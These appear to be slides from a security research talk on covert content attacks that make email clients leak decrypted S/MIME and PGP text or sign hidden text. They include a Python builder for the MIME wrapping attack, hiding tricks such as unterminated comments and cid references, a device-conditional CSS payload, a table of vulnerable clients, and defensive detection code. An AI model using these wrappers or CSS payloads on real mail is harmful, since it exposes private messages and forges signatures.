Re: What's up Johnny? Covert Content Attacks on Email End-to-End Encryption
Jens Müller, Marcus Brinkmann, Damian Poddebniak, Sebastian Schinzel, Jörg Schwenk
Remember EFAIL?

• Last year: EFAIL
  – Major attack with a logo
  – Novel attack techniques targeting S/MIME + PGP
• Today: non-crypto attacks
  – Targeting encryption and digital signatures
Overview

1. Introduction
2. Attacks on Encryption
3. Attacks on Signatures
4. Evaluation
5. Mitigation

1. Introduction
Technology's promise

I. "Strong crypto is virtually unbreakable."
II. "Digital signature will prevail. Math wins."

What if…

…claims I. and II. could be bypassed with a single reply to a benign looking email?
Traditional RFC822 email

From: [email protected]
To: [email protected]
Subject: Important news

Some ASCII text message…
Traditional PGP/Inline

From: [email protected]
To: [email protected]
Subject: Important news

-----BEGIN PGP MESSAGE-----
…
-----END PGP MESSAGE-----
Multipart MIME email

From: [email protected]
To: [email protected]
Content-Type: multipart/mixed; boundary="XXX"

--XXX
Content-type: text/plain

Some ASCII text message…
--XXX
Content-type: text/plain

This is the 2nd part
--XXX--

MIME tree: multipart/mixed → text, text

The parts can be of any type, e.g. HTML and a PDF attachment:

--XXX
Content-type: text/html

<b>HTML</b> message…
--XXX
Content-type: application/pdf

%PDF-1.4 […]
--XXX--

MIME tree: multipart/mixed → html, pdf
S/MIME

From: [email protected]
To: [email protected]
Subject: Important news
Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
Two competing standards

OpenPGP (RFC 4880)
• Favored by privacy advocates
• Web-of-trust (no authorities)

S/MIME (RFC 5751)
• Favored by organizations
• Multi-root trust-hierarchies
2. Attacks on Encryption
Attacker model

• Eve has captured ciphertext
• Can modify email structure
• Can re-send it to the victim
  – Either to recipient or sender
  – Both can decrypt the email
Covert content attack: Decryption oracle

Eve has captured Alice's encrypted email to Johnny:

From: [email protected]
Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…

She cannot read it, but she can wrap the ciphertext in a MIME structure of her own and re-send it. Her text/plain part comes first; the captured encrypted part (opaque to Eve) is the second part:

From: [email protected]
Content-type: multipart/mixed; boundary="XXX"

--XXX
Content-type: text/plain

What's up Johnny?
--XXX
Content-Type: application/pkcs7-mime

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
--XXX--

MIME tree: multipart/mixed → text, ???

Johnny's client decrypts the second part in place, so what it renders (and quotes in Johnny's reply) is:

--XXX
Content-type: text/plain

What's up Johnny?
--XXX
Content-type: text/plain

Secret message, for Johnny's eyes only…
--XXX--

MIME tree: multipart/mixed → text, secret

To keep Johnny from noticing the decrypted plaintext, Eve hides it:

• text/plain with "What's up Johnny?\n\n\n\n\n\n…" (blank lines push the secret out of view)
• text/html with "What's up Johnny? <!--" (unterminated HTML comment)
• text/html with "What's up Johnny? <img src="cid:part2">" and "Content-ID: <part2>" on the encrypted part
• "Content-Disposition: attachment" on the encrypted part
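The wrapping step above, as an added worked example (Python standard library; not the paper's exploit code, which lives in the RUB-NDS repository linked at the end of the deck). It assumes the addresses eve@example.org and johnny@example.org, stands in for the captured ciphertext with a constructed placeholder (the BER prefix that the slide's base64 decodes to, plus filler), builds each of the four hiding variants, and checks after a serialize/parse round trip that the ciphertext part is preserved byte for byte beside Eve's part.

```python
"""Package a captured S/MIME ciphertext inside an attacker-chosen MIME structure,
as on the 'Decryption oracle' slides: the victim's client decrypts the part in
Eve's context, and the hiding variants keep the plaintext out of Johnny's view.
Added example, not the paper's exploit code. Addresses are assumed; the
ciphertext is a constructed placeholder that no key can decrypt."""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed stand-in for the captured ciphertext: the bytes that the slide's
# base64 prefix 'MIAGCSqGSIb3DQEHA6CA' decodes to (indefinite-length SEQUENCE,
# OID id-envelopedData 1.2.840.113549.1.7.3, [0] wrapper) followed by filler.
CAPTURED_CMS = bytes.fromhex("3080 0609 2a86 4886 f70d 0107 03a0 80") + b"\x00" * 32

VARIANTS = ("newlines", "comment", "cid", "attachment")


def captured_part(content_id=None, attachment=False) -> EmailMessage:
    """Re-create the captured application/pkcs7-mime part. Eve cannot read it,
    but she controls every header around it, and the client honours them."""
    part = EmailMessage()
    part.set_content(
        CAPTURED_CMS, maintype="application", subtype="pkcs7-mime",
        disposition="attachment" if attachment else None, cid=content_id,
        params={"smime-type": "enveloped-data", "name": "smime.p7m"})
    return part


def build_wrapper(variant: str) -> EmailMessage:
    """Eve's multipart/mixed message: her own part first, the ciphertext second."""
    msg = EmailMessage()
    msg["From"] = "eve@example.org"      # assumed addresses
    msg["To"] = "johnny@example.org"
    msg["Subject"] = "What's up Johnny?"
    if variant == "newlines":
        # text/plain: 200 blank lines push the decrypted text below the visible window
        msg.set_content("What's up Johnny?" + "\n" * 200)
        cipher = captured_part()
    elif variant == "comment":
        # text/html: an unterminated comment swallows whatever is rendered after it
        msg.set_content("What's up Johnny? <!--", subtype="html")
        cipher = captured_part()
    elif variant == "cid":
        # text/html: the ciphertext part is referenced as an image, so it is
        # decrypted by the client without being displayed as text
        msg.set_content('What\'s up Johnny? <img src="cid:part2">', subtype="html")
        cipher = captured_part(content_id="<part2>")
    elif variant == "attachment":
        # the decrypted text ends up as an attachment instead of in the visible body
        msg.set_content("What's up Johnny?")
        cipher = captured_part(attachment=True)
    else:
        raise ValueError(f"unknown variant: {variant}")
    msg.make_mixed()        # moves Eve's content into the first sub-part
    msg.attach(cipher)      # the untouched ciphertext becomes the second sub-part
    return msg


def roundtrip(variant: str) -> EmailMessage:
    """Serialise the wrapper and parse it back, as the victim's client would."""
    raw = build_wrapper(variant).as_bytes()
    return BytesParser(policy=policy.default).parsebytes(raw)


def check_wrapper(variant: str) -> bool:
    """True if the ciphertext survived byte for byte next to Eve's text part."""
    msg = roundtrip(variant)
    parts = list(msg.iter_parts())
    return (msg.get_content_type() == "multipart/mixed"
            and len(parts) == 2
            and parts[0].get_content().startswith("What's up Johnny?")
            and parts[1].get_content_type() == "application/pkcs7-mime"
            and parts[1].get_content() == CAPTURED_CMS)


if __name__ == "__main__":
    for v in VARIANTS:
        print(v, "ok" if check_wrapper(v) else "FAILED")
    print(build_wrapper("comment").as_string())
```

Nothing in the wrapper touches the ciphertext itself: the attack needs no key and no cryptographic weakness, only a client that decrypts a part wherever it sits in the MIME tree and renders the result together with Eve's part.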
3. Attacks on Signatures
Covert content attack: Signing oracle

Eve sends Johnny an HTML email in which the covert text sits in its own element:

From: [email protected]
To: [email protected]
Content-Type: text/html

What's up Johnny?
<div class="covert">I hereby declare war.</div>

A conditional style rule (IF condition: hide * but show .covert) decides which text is displayed where:

<style>
@media (max-device-width: 834px) { .covert { visibility: hidden; } }
@media (min-device-width: 835px) { * { visibility: hidden; } .covert { visibility: visible } }
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>

The first rule hides the covert content on mobile devices; the second hides everything except the covert content on desktop devices.

Re: What's up Johnny?

Reply email sent from Johnny's mobile phone (the quoted HTML, style rules included, is signed together with his answer):

I'm fine, thanks.

On 01/05/19 09:53, Eve wrote:
> What's up Johnny?

Signed email received on a desktop device (only the covert content is visible):

I hereby declare war.
Conditional rules

• Targeting device type (@media)
• Targeting email client (@supports)
• Targeting user account (@document)
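A check for the conditional rules above, as an added example (Python standard library; not the paper's or any client's code): it lists the @media / @supports / @document at-rules in an HTML body whose block hides content, and it strips <style> elements, style= attributes and comments in the way the "Remove styles from replies" mitigation later in the deck proposes, so that the text quoted in a reply shows the covert content openly before the user signs it. The covert email from the signature-oracle slide is embedded as sample input.

```python
"""Spot conditional CSS that shows different text on different devices or
clients (the signing-oracle trick on the slides) and strip styling before
HTML is quoted in a reply. Added example, not the paper's or any client's
code; standard library only."""
import html
import re
from html.parser import HTMLParser

# At-rules from the 'Conditional rules' slide: @media selects on device type,
# @supports on the rendering engine's feature set, @document / @-moz-document
# on the document URL, which in webmail can identify the logged-in account.
CONDITIONAL_AT_RULE = re.compile(r"@(?:media|supports|(?:-moz-)?document)\b[^{]*", re.I)
HIDING_DECLARATION = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
STYLE_ELEMENT = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)


def _brace_block(css: str, start: int) -> str:
    """Return the {...} block that starts at css[start], honouring nesting."""
    depth = 0
    for i in range(start, len(css)):
        if css[i] == "{":
            depth += 1
        elif css[i] == "}":
            depth -= 1
            if depth == 0:
                return css[start:i + 1]
    return css[start:]


def find_covert_rules(body_html: str) -> list:
    """Preludes of the conditional at-rules whose block hides something."""
    found = []
    for css in STYLE_ELEMENT.findall(body_html):
        for m in CONDITIONAL_AT_RULE.finditer(css):
            if HIDING_DECLARATION.search(_brace_block(css, m.end())):
                found.append(m.group(0).strip())
    return found


class _StyleStripper(HTMLParser):
    """Re-emit markup without <style> elements, style= attributes or comments,
    so whatever was conditionally hidden is visible to whoever signs it."""

    def __init__(self):
        super().__init__(convert_charrefs=False)   # keep &amp; etc. as written
        self.out = []
        self._in_style = 0

    def _emit_tag(self, tag, attrs, self_closing):
        kept = [(k, v) for k, v in attrs if k.lower() != "style"]
        text = "".join(f' {k}="{html.escape(v, quote=True)}"' if v is not None else f" {k}"
                       for k, v in kept)
        self.out.append(f"<{tag}{text}{'/' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style += 1
        elif not self._in_style:
            self._emit_tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        if tag != "style" and not self._in_style:
            self._emit_tag(tag, attrs, True)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = max(0, self._in_style - 1)
        elif not self._in_style:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._in_style:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._in_style:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._in_style:
            self.out.append(f"&#{name};")


def strip_styles_for_reply(body_html: str) -> str:
    """The HTML to quote in a reply: same text and elements, no styling at all."""
    parser = _StyleStripper()
    parser.feed(body_html)
    parser.close()
    return "".join(parser.out)


# Sample input: the covert email from the 'Signature oracle' slide.
COVERT_EMAIL = (
    "<style>@media (max-device-width: 834px) {.covert {visibility: hidden;}}\n"
    "@media (min-device-width: 835px) {* {visibility: hidden;}.covert {visibility: visible}}\n"
    "</style>What's up Johnny?<div class=\"covert\">I hereby declare war.</div>")

if __name__ == "__main__":
    print(find_covert_rules(COVERT_EMAIL))
    print(strip_styles_for_reply(COVERT_EMAIL))
```

The stripped reply still contains "I hereby declare war.", but now unconditionally and in plain view, so Johnny sees what he is about to sign; dropping the rules on receipt alone does not help a client that quotes the original markup into the reply.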
4. Evaluation
Decryption and signature oracles per client

OS       Client          Decryption     Signatures
                         S/MIME  PGP    S/MIME  PGP
Windows  Thunderbird       ●      ●       ●      ●
         Outlook           ○      ○       ◐      ◐
         Win. 10 Mail      ○      –       ◐      –
         Win Live Mail     ○      –       ●      –
         The Bat!          ○      ○       ○      ○
         Postbox           ●      ●       ●      ●
         eM Client         ○      ○       ◐      ◐
Linux    KMail             ◐      ◐       ○      ○
         Evolution         ◐      ◐       ◐      ◐
         Trojitá           ◐      ◐       ◐      ◐
         Claws             ◐      ◐       ○      ○
         Mutt              ◐      ◐       ○      ○
macOS    Apple Mail        ●      ●       ◐      ◐
         MailMate          ●      ●       ●      ●
         Airmail           ●      ●       ●      ●
iOS      Mail App          ●      –       ●      –
Android  K-9 Mail          –      ○       –      ●
         R2Mail2           ○      ●       ◐      ◐
         MailDroid         ○      ○       ●      ●
         Nine              ○      –       ●      –
Web      Exchange/OWA      ○      –       ●      –
         Roundcube         –      ◐       ◐      ◐
         Horde/IMP         ○      ○       ◐      ◐
         Mailpile          –      ○       –      ○

Decryption oracles: ● plaintext can be completely hidden; ◐ plaintext merged with attacker text
Signature oracles: ● covert rules kept in reply message; ◐ covert rules only for received mail
Both: ○ no vulnerabilities found; – cryptosystem not available
5. Mitigation
Decryption oracles

• Accepting ASCII text only
• Enforcing digital signatures
• Warn on partial encryption
• All-or-Nothing Encryption

Root causes: long-term keys + ciphertext usage out-of-context
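The "Warn on partial encryption" check, as an added example (Python standard library; not the paper's or any client's code): it walks the MIME tree and reports a message as encrypted only when every leaf is ciphertext (S/MIME enveloped-data, a PGP/MIME multipart/encrypted container, or a text/plain part that is nothing but a PGP armor block), and as partial when ciphertext sits beside attacker-controllable plaintext, including the PGP/Inline case where attacker text is merged into the same text part. The sample messages are constructed, with placeholder ciphertext bodies that are never decrypted.

```python
"""Decide whether an incoming message is fully encrypted, partially encrypted
or plaintext, the check behind 'Warn on partial encryption': ciphertext that
arrives next to parts the sender could not have encrypted is being used out
of its context. Added example, not the paper's or any client's code. Sample
messages are constructed; their ciphertext bodies are placeholders."""
from email import policy
from email.parser import BytesParser

ARMOR_BEGIN = "-----BEGIN PGP MESSAGE-----"
ARMOR_END = "-----END PGP MESSAGE-----"


def _leaf_kinds(part) -> list:
    """Walk the MIME tree; return 'encrypted' or 'plaintext' for every leaf."""
    ctype = part.get_content_type()
    if ctype == "multipart/encrypted":
        return ["encrypted"]            # PGP/MIME: the container is one ciphertext
    if ctype == "application/pkcs7-mime":
        # enveloped-data is S/MIME encryption; signed-data (opaque signing) is not
        smime_type = part.get_param("smime-type")
        return ["encrypted" if smime_type in (None, "enveloped-data") else "plaintext"]
    if part.is_multipart():
        kinds = []
        for sub in part.iter_parts():
            kinds.extend(_leaf_kinds(sub))
        return kinds
    if ctype == "text/plain":
        body = part.get_content().strip()
        if body.startswith(ARMOR_BEGIN) and body.endswith(ARMOR_END):
            return ["encrypted"]        # PGP/Inline: nothing but the armor block
        if ARMOR_BEGIN in body:
            return ["plaintext", "encrypted"]   # armor merged with other text
    return ["plaintext"]


def classify_encryption(raw: bytes) -> str:
    """'encrypted', 'partial' or 'plaintext' for a raw RFC822 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    kinds = set(_leaf_kinds(msg))
    if kinds == {"encrypted"}:
        return "encrypted"
    return "partial" if "encrypted" in kinds else "plaintext"


# Constructed sample: Alice's S/MIME message as captured (placeholder body).
SMIME_ONLY = b"""From: alice@example.org
To: johnny@example.org
Subject: Important news
Content-Type: application/pkcs7-mime; smime-type=enveloped-data; name="smime.p7m"
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB
"""

# Constructed sample: the same ciphertext wrapped by Eve (decryption-oracle structure).
WRAPPED_SMIME = b"""From: eve@example.org
To: johnny@example.org
Subject: What's up Johnny?
Content-Type: multipart/mixed; boundary="XXX"

--XXX
Content-Type: text/plain

What's up Johnny?
--XXX
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB
--XXX--
"""

# Constructed sample: PGP/MIME (RFC 3156), one multipart/encrypted container.
PGP_MIME = b"""From: alice@example.org
To: johnny@example.org
Subject: Important news
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="YYY"

--YYY
Content-Type: application/pgp-encrypted

Version: 1
--YYY
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----

(placeholder for the captured armored ciphertext)
-----END PGP MESSAGE-----
--YYY--
"""

# Constructed sample: PGP/Inline with attacker text prepended in the same part.
INLINE_MERGED = b"""From: eve@example.org
To: johnny@example.org
Subject: What's up Johnny?
Content-Type: text/plain

What's up Johnny?

-----BEGIN PGP MESSAGE-----

(placeholder for the captured armored ciphertext)
-----END PGP MESSAGE-----
"""

if __name__ == "__main__":
    for name, raw in [("S/MIME", SMIME_ONLY), ("wrapped", WRAPPED_SMIME),
                      ("PGP/MIME", PGP_MIME), ("inline merged", INLINE_MERGED)]:
        print(f"{name:14s} {classify_encryption(raw)}")
```

The decision is taken on the MIME structure before anything is decrypted, which is the point: once a client has decrypted the part and rendered it next to Eve's text, the plaintext is already in the reply buffer. A "partial" result is what the mitigation turns into a warning, and All-or-Nothing Encryption is the same rule enforced rather than reported.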
Signing oracles

• Dropping CSS support
• Only ASCII text in replies
• Remove styles from replies
Conclusion

• Crypto is not enough, bypasses exist
• 22 of 24 tested clients are vulnerable
• Building security on top of email is hard

Thank you! Questions?
Exploits: github.com/RUB-NDS/Covert-Content-Attacks
HTML and CSS support in various email clients
Proprietary conditional features
Blinding options